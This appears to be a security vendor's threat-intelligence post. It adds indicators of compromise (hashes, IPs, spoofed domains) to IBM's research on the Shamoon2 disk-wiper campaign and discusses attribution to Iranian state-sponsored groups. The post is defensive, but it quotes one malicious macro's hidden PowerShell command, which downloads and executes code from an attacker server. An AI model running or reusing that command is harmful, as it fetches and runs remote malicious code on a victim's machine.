- disk wiper
- IOCs
- Iran
- Saudi Arabia
- Shamoon
- Shamoon2
Additional Insights on Shamoon2
IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia. Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon. Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign.
While researching elements in the IBM report, ASERT discovered additional malicious domains, IP addresses, and artifacts. The basic functionality of the new documents and their PowerShell components matched what was previously disclosed. For more information on the overall capabilities of the malware, please review IBM's ongoing research. It is our hope that by providing additional indicators, end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises.
Initial Discoveries
The following new samples were likely delivered via similar spear phishing campaigns as described in IBM's research. All three shared the same IPs and URLs, also provided below. These samples were located by pivoting on document attributes. In this case, a sample from the IBM report indicated the document author ‘gerry.knight’ which led us to the following three additional samples.
MD5
- 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196
IPs
- 104.218.120[.]128
- 69.87.223[.]26
- 5.254.100[.]200
URLs
- analytics-google[.]org:69/checkFile.aspx
- analytics-google[.]org
- 69.87.223[.]26:8080/p
The following is a screenshot of a macro-enabled document captured from sample 5e5ea1a67c2538dbc01df28e4ea87472:
Once enabled the extracted macro executed the following:
'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://69.87.223.26:8080/p\')"'
Pivoting on Passive DNS
From the previous samples, we performed a passive DNS lookup on the IPs. We found get.adobe.go-microstf[.]com hosted at 104.218.120[.]128 around the time this campaign was ongoing, November 2016.
Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious executables. In this case, a URL used to download the PowerShell component shared a naming convention found in the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples. The following are IOCs related to this domain:
MD5
- 83be35956e5d409306a81e88a1dc89fd
IPs
- 45.63.10[.]99
- 69.87.223[.]26
- URLs go-microstf[.]com
- 69.87.223[.]26:8080/eiloShaegae1
- go-microstf[.]com/checkfile.aspx
The domain go-microstf[.]com was originally set up to spoof Google Analytics login page. The following screenshot is from the malicious domain:
Possible Connections to Iranian state-sponsored Kittens
Finally, research yielded a relatively unique sample. This particular iteration was submitted to VirusTotal on September 16, 2016. The majority of samples analyzed to date were submitted no earlier than mid-October, with most being submitted in January 2017 or later. We were able to discover this particular version by diving further into connections to analytics-google[.]org. Unlike newer samples, this one created a unique file ‘sloo.exe'. The file was created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this file, the sample also contacted 104.238.184[.]252 for the PowerShell executable.
Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they’ve named Magic Hound. The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups.
Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT. In addition, Dell analysts have assessed with high-confidence these activities are attributable to Iranian state-sponsored activities.
IOCs for this version were:
- MD5 07d6406036d6e06dc8019e3ade6ee7de
IPs
- 104.238.184[.]252
- 5.254.100[.]200
- URLs
- analytics-google[.]org:69/checkFile.aspx
Conclusion
These additional IOCs will hopefully provide more context into the ongoing threat. The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors. The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems.
Consolidated IOC list:
MD5
- 2a0df97277ddb361cecf8726df6d78ac
- 5e5ea1a67c2538dbc01df28e4ea87472
- d30b8468d16b631cafe458fd94cc3196
- 83be35956e5d409306a81e88a1dc89fd
- 07d6406036d6e06dc8019e3ade6ee7de
IPs
- 104.218.120[.]128
- 69.87.223[.]26
- 5.254.100[.]200
- 45.63.10[.]99
- 104.238.184[.]252
URLs
- analytics-google[.]org:69/checkFile.aspx
- analytics-google[.]org
- 69.87.223[.]26:8080/p
- go-microstf[.]com
- 69.87.223[.]26:8080/eiloShaegae1
- get.adobe.go-microstf[.]com
- go-microstf[.]com/checkfile.aspx
- Analysis
- Attack Lifecycle
- Interesting Research
- Malware
- Uncategorized